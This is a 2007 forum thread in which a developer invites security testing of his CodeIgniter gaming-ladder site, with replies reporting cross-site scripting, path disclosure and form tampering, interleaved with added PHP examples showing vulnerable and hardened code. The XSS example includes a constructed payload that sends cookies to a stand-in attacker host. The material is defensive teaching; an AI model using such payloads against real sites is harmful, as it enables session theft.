Kemik Posted August 24, 2007 Hello all, I've coded a gaming ladder website using CodeIgniter and I'd like to let you guys test it out, see what you think, find bugs, security holes, etc. The challenge system hasn't been finished yet so you won't be able to test that. This is mainly for you to find bugs in permissions and current forms and features. Here's the site: http://www.ocwars.com/v2/ There will be a database wipe before I go live so don't worry about damage (try to keep my table structures intact if you manage to screw with my validation). Test to see if you can access the admin area too: http://www.ocwars.com/v2/index.php/admin/news Thanks for your help!
agentsteal Posted August 24, 2007
Cross Site Scripting: There is Cross Site Scripting if the website contains "code.
Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://www.ocwars.com/v2/application/rapyd/.
Drop Down Menu: If you edit the Country Code drop down menu you can submit arbitrary values.
Includes Directory: http://www.ocwars.com/v2/application/rapyd/
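For the Cross Site Scripting item above, the following is an added example and not code from the ocwars.com site or from agentsteal's post. It shows the pattern that makes a submitted value (a clan name is assumed here) executable in the browser, next to the output-encoded version; the payload string is constructed for the example.

```php
<?php
// Added example, not the site's code: raw echo of user input (vulnerable)
// beside HTML-context output encoding (hardened).
declare(strict_types=1);

// Constructed attacker input, e.g. submitted as a clan name or news title.
$clanName = '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

// VULNERABLE: the value is interpolated into the page as-is, so the browser
// parses and executes the <script> element.
function render_unescaped(string $value): string
{
    return "<h2>Clan: $value</h2>";
}

// HARDENED: encode for an HTML text context. ENT_QUOTES also encodes ' and ",
// which is what stops a break-out when the value lands inside an attribute;
// the charset is given explicitly so the encoder does not have to guess it.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

function render_escaped(string $value): string
{
    return '<h2>Clan: ' . h($value) . '</h2>';
}

// Attribute context: the same helper is enough here because both quote styles
// are encoded, so the injected quote cannot close the value="" attribute.
function render_input(string $value): string
{
    return '<input type="text" name="clan_name" value="' . h($value) . '">';
}

echo render_unescaped($clanName), PHP_EOL;                   // <script> reaches the browser intact
echo render_escaped($clanName), PHP_EOL;                     // &lt;script&gt;... rendered as text
echo render_input('" autofocus onfocus="alert(1)'), PHP_EOL; // quotes encoded, attribute stays closed
```

htmlspecialchars() is an HTML-context encoder only: a value placed inside a JavaScript string, a URL, or a CSS block needs the encoding for that context instead, and an input filter on the way in is not a substitute for encoding on the way out.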
Kemik Posted August 25, 2007 Author Thanks for the heads up. Rapyd is a plugin library for CI so I'll have to go through it all and see where the problems are as I didn't code that. By the way, I noticed you signed up and created a clan. How did you manage to change the inputted country code from the drop down box to a? How did you manage to get around having a leader_id when creating a clan (hidden input) and a blank datetime? Thanks.
Kemik Posted August 25, 2007 Author I've fixed the user being able to access the directory and see the list of files, etc., but how would I go about fixing the Full Path Disclosure? A Google search just brings up different security reports of scripts but no solutions.
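As an added example (not the site's code and not from any post in this thread), this is the usual cause of Full Path Disclosure and the production-safe replacement: a PHP warning printed to the visitor carries the absolute filesystem path of the file it occurred in, so diagnostics must go to a log instead of the response. The log path and the example warning text are assumed for illustration.

```php
<?php
// Added example, not the original site's code.
//
// WEAK (common development settings):
//   ini_set('display_errors', '1');
//   error_reporting(E_ALL);
// A notice such as (constructed text)
//   "Notice: Undefined variable: x in /home/site/public_html/v2/application/rapyd/foo.php on line 12"
// is then sent to the browser and reveals the absolute path of the install.

// HARDENED: never send diagnostics to the client; log them server-side.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', __DIR__ . '/../logs/php-error.log'); // assumed path, outside the web root
error_reporting(E_ALL);

// Turn every PHP error into an exception so nothing is emitted as a printed warning.
set_error_handler(function (int $severity, string $message, string $file, int $line): bool {
    throw new ErrorException($message, 0, $severity, $file, $line);
});

// One handler for anything uncaught: the detail (including the path) goes to the
// log, the visitor gets a generic message with no file, line or stack trace.
set_exception_handler(function (Throwable $e): void {
    error_log(sprintf('%s in %s:%d', $e->getMessage(), $e->getFile(), $e->getLine()));
    http_response_code(500);
    echo 'An internal error occurred.';
});

// Library files that should only ever be included by the framework (such as the
// files under /v2/application/rapyd/) can refuse to run when requested directly.
// This is the guard line CodeIgniter places at the top of its own files:
//   if (!defined('BASEPATH')) exit('No direct script access allowed');

// Directory listing is a web server setting rather than a PHP one; for Apache,
// in .htaccess or the vhost:
//   Options -Indexes
```

Setting these in php.ini (or the vhost) rather than in a script is preferable, because an error raised while PHP is still compiling the script that contains the ini_set() calls would be displayed before they take effect. Requesting a library file directly, as agentsteal did under /application/rapyd/, is exactly the case where an undefined-variable notice appears, since the file runs outside the framework that normally defines its inputs.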
Kemik Posted August 26, 2007 Author Yeah, I added that line, just in case there were errors. I'll add validation to the drop down menu; however, wouldn't this be possible with most sites that use drop down menus?
lightningstrike Posted August 27, 2007 Not likely; they usually have a strong validation set if they are well coded. Changing a drop-down to an invalid value will probably have it reset to a default, perhaps using a switch statement and default.
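Added example, not code from the ocwars.com site or from either poster: server-side allowlisting of a select value in the two styles discussed above (reset to a default, or reject outright), plus the related fix for the clan-creation form from Kemik's earlier question, where leader_id was a hidden input and the datetime came from the client. The country list, field names and the 32-character limit are assumed for the example; the tampered submission is constructed.

```php
<?php
// Added example, not the original site's code. Everything the browser sends
// (select values, hidden inputs, datetimes) can be rewritten with a proxy or by
// editing the form in the browser, so the server decides what is valid.
declare(strict_types=1);

// The same list that renders the drop-down (constructed subset).
const COUNTRY_CODES = ['gb', 'us', 'de', 'fr', 'se'];
const DEFAULT_COUNTRY = 'gb';

// Lenient style: an unknown value falls back to the default. The type check
// also catches a value sent as country_code[]=x, which arrives as an array.
function normalise_country(mixed $submitted): string
{
    if (!is_string($submitted)) {
        return DEFAULT_COUNTRY;
    }
    $code = strtolower(trim($submitted));
    return in_array($code, COUNTRY_CODES, true) ? $code : DEFAULT_COUNTRY;
}

// Strict style: refuse the submission, so a tampered form never produces a
// half-valid record that then has to be cleaned out of the table.
function assert_country(mixed $submitted): string
{
    if (!is_string($submitted)) {
        throw new InvalidArgumentException('country_code must be a string');
    }
    $code = strtolower(trim($submitted));
    if (!in_array($code, COUNTRY_CODES, true)) {
        throw new InvalidArgumentException('country_code is not one of the offered values');
    }
    return $code;
}

// Build the row to insert. leader_id is taken from the authenticated session,
// never from a hidden input; created_at is stamped by the server, not posted.
// $sessionUserId is assumed to come from the login session.
function build_clan_row(array $post, int $sessionUserId): array
{
    $name = trim((string)($post['clan_name'] ?? ''));
    if ($name === '' || mb_strlen($name) > 32) {
        throw new InvalidArgumentException('clan_name must be 1-32 characters');
    }
    return [
        'name'       => $name,
        'country'    => assert_country($post['country_code'] ?? null),
        'leader_id'  => $sessionUserId,            // hidden-input leader_id is ignored
        'created_at' => date('Y-m-d H:i:s'),       // client cannot submit a blank datetime
    ];
}

// Constructed tampered submission: an invented country code and a rewritten
// hidden field trying to make user 1 the leader.
$tampered = ['clan_name' => 'Testers', 'country_code' => 'zz', 'leader_id' => '1'];

echo normalise_country($tampered['country_code']), PHP_EOL;   // gb (reset to default)
try {
    build_clan_row($tampered, 42);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;            // strict path refuses it
}
print_r(build_clan_row(['clan_name' => 'Testers', 'country_code' => 'DE'], 42));
// leader_id is 42 from the session, country is 'de', created_at is server time
```

The allowlist has to be the same array the form is rendered from; validating against a separate hand-typed list drifts out of sync the first time a country is added. In CodeIgniter the same checks can sit in a form validation callback, but the point is identical: the client-side select restricts what a well-behaved browser offers, and nothing more.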